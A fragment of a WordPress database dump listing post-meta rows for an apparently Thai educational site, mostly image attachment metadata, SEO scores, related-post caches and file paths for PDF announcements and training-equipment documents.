(9055, 4030, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:57:\"2018/10/42603570_682984702077721_378418989946109952_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"42603570_682984702077721_378418989946109952_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"42603570_682984702077721_378418989946109952_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"42603570_682984702077721_378418989946109952_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"42603570_682984702077721_378418989946109952_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"42603570_682984702077721_378418989946109952_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9056, 4029, '_thumbnail_id', '4030'),
(9060, 4029, '_hide_featured', NULL),
(9061, 4029, '_yoast_wpseo_content_score', '30'),
(9062, 4029, '_yoast_wpseo_primary_category', '31'),
(9063, 4029, '_wpas_done_all', '1'),
(9064, 4033, '_edit_lock', '1538536078:3'),
(9065, 4033, '_edit_last', '3'),
(9066, 4034, '_wp_attached_file', '2018/10/42826148_685532721822919_4711076582473596928_o.jpg'),
(9067, 4034, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/10/42826148_685532721822919_4711076582473596928_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"42826148_685532721822919_4711076582473596928_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"42826148_685532721822919_4711076582473596928_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"42826148_685532721822919_4711076582473596928_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"42826148_685532721822919_4711076582473596928_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"42826148_685532721822919_4711076582473596928_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9068, 4033, '_thumbnail_id', '4067'),
(9072, 4033, '_hide_featured', NULL),
(9073, 4033, '_yoast_wpseo_content_score', '30'),
(9074, 4033, '_yoast_wpseo_primary_category', '31'),
(9075, 4033, '_wpas_done_all', '1'),
(9076, 4026, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575560715;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5769;}i:1;a:1:{s:2:\"id\";i:3971;}i:2;a:1:{s:2:\"id\";i:4182;}}}}'),
(9077, 4023, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575723088;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4010;}i:1;a:1:{s:2:\"id\";i:6143;}i:2;a:1:{s:2:\"id\";i:4875;}}}}'),
(9078, 821, '_yoast_wpseo_content_score', '60'),
(9079, 3217, '_yoast_wpseo_content_score', '90'),
(9080, 4042, '_wp_attached_file', '2018/10/2-10-2561-11-06-56.jpg'),
(9081, 4042, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:845;s:6:\"height\";i:299;s:4:\"file\";s:30:\"2018/10/2-10-2561-11-06-56.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"2-10-2561-11-06-56-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"2-10-2561-11-06-56-300x106.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"2-10-2561-11-06-56-768x272.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"2-10-2561-11-06-56-400x142.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9082, 4043, '_wp_attached_file', '2018/10/2-10-2561-11-05-59.jpg'),
(9083, 4043, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:843;s:6:\"height\";i:376;s:4:\"file\";s:30:\"2018/10/2-10-2561-11-05-59.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"2-10-2561-11-05-59-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"2-10-2561-11-05-59-300x134.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"2-10-2561-11-05-59-768x343.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:343;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"2-10-2561-11-05-59-400x178.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9084, 2994, '_yoast_wpseo_content_score', '90'),
(9085, 2809, '_yoast_wpseo_content_score', '90'),
(9086, 4048, '_edit_lock', '1539750673:3'),
(9087, 4048, '_edit_last', '3'),
(9088, 4049, '_wp_attached_file', '2018/10/DSC00705.jpg'),
(9089, 4049, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2160;s:6:\"height\";i:1440;s:4:\"file\";s:20:\"2018/10/DSC00705.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC00705-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC00705-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC00705-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC00705-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC00705-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-R1\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1210216490\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"15.1\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9090, 4050, '_wp_attached_file', '2018/10/Picture-163.jpg'),
(9091, 4050, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:23:\"2018/10/Picture-163.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Picture-163-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Picture-163-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Picture-163-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Picture-163-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"Picture-163-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"EX-Z33\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1278927271\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.3\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9092, 4048, '_hide_featured', NULL),
(9093, 4048, '_yoast_wpseo_content_score', '90'),
(9094, 4033, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575591613;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4961;}i:1;a:1:{s:2:\"id\";i:5388;}i:2;a:1:{s:2:\"id\";i:6074;}}}}'),
(9095, 4029, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575460713;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4742;}i:1;a:1:{s:2:\"id\";i:4711;}i:2;a:1:{s:2:\"id\";i:5994;}}}}'),
(9096, 4054, '_edit_lock', '1538533953:3'),
(9097, 4054, '_edit_last', '3'),
(9098, 4055, '_wp_attached_file', '2018/10/ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์.pdf'),
(9102, 4054, '_hide_featured', NULL),
(9103, 4054, '_yoast_wpseo_content_score', '60'),
(9104, 4054, '_yoast_wpseo_primary_category', '3'),
(9105, 4054, '_wpas_done_all', '1'),
(9106, 4057, '_edit_lock', '1538534718:3'),
(9107, 4057, '_edit_last', '3'),
(9108, 4058, '_wp_attached_file', '2018/10/หุ่นยนต์เชื่อมพร้อมชุดเชื่อมชนิด-CMT.pdf'),
(9112, 4057, '_hide_featured', NULL),
(9113, 4057, '_yoast_wpseo_content_score', '60'),
(9114, 4057, '_yoast_wpseo_primary_category', '3'),
(9115, 4057, '_wpas_done_all', '1'),
(9116, 4057, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575688247;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5900;}i:1;a:1:{s:2:\"id\";i:4415;}i:2;a:1:{s:2:\"id\";i:6306;}}}}'),
(9117, 4060, '_edit_lock', '1538535397:3'),
(9118, 4060, '_edit_last', '3'),
(9119, 4061, '_wp_attached_file', '2018/10/ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ.pdf'),
(9123, 4060, '_hide_featured', NULL),
(9124, 4060, '_yoast_wpseo_content_score', '60'),
(9125, 4060, '_yoast_wpseo_primary_category', '3'),
(9126, 4060, '_wpas_done_all', '1'),
(9127, 4063, '_edit_lock', '1538536079:3'),
(9128, 4063, '_edit_last', '3'),
(9129, 4064, '_wp_attached_file', '2018/10/ชุดฝึกหุ่นยนต์อุตสาหกรรม.pdf'),
(9133, 4063, '_hide_featured', NULL),
(9134, 4063, '_yoast_wpseo_content_score', '30'),
(9135, 4063, '_yoast_wpseo_primary_category', '3'),
(9136, 4063, '_wpas_done_all', '1'),
(9137, 4067, '_wp_attached_file', '2018/10/42855045_685621068480751_6519273520784998400_o.jpg'),
(9138, 4067, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/10/42855045_685621068480751_6519273520784998400_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"42855045_685621068480751_6519273520784998400_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"42855045_685621068480751_6519273520784998400_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"42855045_685621068480751_6519273520784998400_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"42855045_685621068480751_6519273520784998400_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"42855045_685621068480751_6519273520784998400_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9141, 4063, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575617435;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:4975;}}}}'),
(9143, 4054, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575478823;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4975;}i:1;a:1:{s:2:\"id\";i:4907;}i:2;a:1:{s:2:\"id\";i:4154;}}}}'),
(9144, 4060, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575719696;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:4154;}i:2;a:1:{s:2:\"id\";i:4975;}}}}'),
(9145, 4070, '_edit_lock', '1538624141:3'),
(9146, 4070, '_edit_last', '3'),
(9147, 4071, '_wp_attached_file', '2018/10/42933039_685738788468979_201661504959807488_o.jpg'),
(9148, 4071, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:57:\"2018/10/42933039_685738788468979_201661504959807488_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"42933039_685738788468979_201661504959807488_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"42933039_685738788468979_201661504959807488_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"42933039_685738788468979_201661504959807488_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"42933039_685738788468979_201661504959807488_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"42933039_685738788468979_201661504959807488_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9149, 4070, '_thumbnail_id', '4071'),
(9153, 4070, '_hide_featured', NULL),
(9154, 4070, '_yoast_wpseo_content_score', '30'),
(9155, 4070, '_yoast_wpseo_primary_category', '31'),
(9156, 4070, '_wpas_done_all', '1'),
(9157, 4073, '_edit_lock', '1538624434:3'),
(9158, 4073, '_edit_last', '3'),
(9159, 4074, '_wp_attached_file', '2018/10/43091933_1986424988044362_8232802190117306368_n.jpg'),
(9160, 4074, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:589;s:4:\"file\";s:59:\"2018/10/43091933_1986424988044362_8232802190117306368_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"43091933_1986424988044362_8232802190117306368_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"43091933_1986424988044362_8232802190117306368_n-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"43091933_1986424988044362_8232802190117306368_n-768x471.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:471;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"43091933_1986424988044362_8232802190117306368_n-400x245.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:245;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9161, 4073, '_thumbnail_id', '4074'),
(9165, 4073, '_hide_featured', NULL),
(9166, 4073, '_yoast_wpseo_content_score', '30'),
(9167, 4073, '_yoast_wpseo_primary_category', '31'),
(9168, 4073, '_wpas_done_all', '1'),
(9169, 4076, '_edit_lock', '1538638476:3'),
(9170, 4070, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575719678;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5865;}i:1;a:1:{s:2:\"id\";i:5900;}i:2;a:1:{s:2:\"id\";i:4023;}}}}'),
(9171, 4076, '_edit_last', '3'),
(9172, 4073, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575601338;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4875;}i:1;a:1:{s:2:\"id\";i:4701;}i:2;a:1:{s:2:\"id\";i:4304;}}}}'),
(9173, 4077, '_wp_attached_file', '2018/10/42959026_686486801727511_6724840418032222208_o.jpg'),
(9174, 4077, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/10/42959026_686486801727511_6724840418032222208_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"42959026_686486801727511_6724840418032222208_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"42959026_686486801727511_6724840418032222208_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"42959026_686486801727511_6724840418032222208_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"42959026_686486801727511_6724840418032222208_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"42959026_686486801727511_6724840418032222208_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9175, 4076, '_thumbnail_id', '4077'),
(9179, 4076, '_hide_featured', NULL),
(9180, 4076, '_yoast_wpseo_content_score', '30'),
(9181, 4076, '_yoast_wpseo_primary_category', '31'),
(9182, 4076, '_wpas_done_all', '1'),
(9183, 4076, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575742626;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5769;}i:1;a:1:{s:2:\"id\";i:5962;}i:2;a:1:{s:2:\"id\";i:5026;}}}}'),
(9184, 4079, '_edit_lock', '1538725432:3'),
(9185, 4079, '_edit_last', '3'),
(9186, 4080, '_wp_attached_file', '2018/10/ประกาศรับสมัครสอบคัดเลือกลูกจ้างชั่วคราว-ทำหน้าที่-เจ้าหน้าที่-ธุรการ.pdf'),
(9190, 4079, '_hide_featured', NULL),
(9191, 4079, '_yoast_wpseo_content_score', '60'),
(9192, 4079, '_yoast_wpseo_primary_category', '3'),
(9193, 4079, '_wpas_done_all', '1'),
(9194, 4079, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575244408;s:7:\"payload\";a:0:{}}}'),
(9205, 4086, '_wp_attached_file', '2018/10/e-Student-Banner.jpg'),
(9206, 4086, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:220;s:6:\"height\";i:97;s:4:\"file\";s:28:\"2018/10/e-Student-Banner.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"e-Student-Banner-150x97.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:97;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9214, 4093, '_edit_lock', '1538930060:1'),
(9215, 4093, '_edit_last', '1'),
(9216, 4093, '_cg_img_link', 'http://203.151.93.149/rayong/index.php'),
(9217, 4093, '_cg_link_target', ''),
(9221, 4093, '_hide_featured', NULL),
(9222, 4093, '_yoast_wpseo_content_score', '60'),
(9223, 4093, '_yoast_wpseo_primary_category', '39'),
(9224, 4093, '_wpas_done_all', '1'),
(9225, 4093, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575667213;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4668;}i:1;a:1:{s:2:\"id\";i:4651;}i:2;a:1:{s:2:\"id\";i:5469;}}}}'),
(9228, 4093, '_wp_old_slug', '4093-2'),
(9231, 4093, '_wp_old_slug', '%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%ad%e0%b8%99%e0%b9%84%e0%b8%a5%e0%b8%99%e0%b9%8c%e0%b8%a0%e0%b8%b2%e0%b8%84%e0%b9%80%e0%b8%a3%e0%b8%b5'),
(9236, 4098, '_edit_lock', '1539140358:3'),
(9237, 4098, '_edit_last', '3'),
(9238, 4099, '_wp_attached_file', '2018/10/43372313_689079111468280_8373507590771965952_o.jpg'),
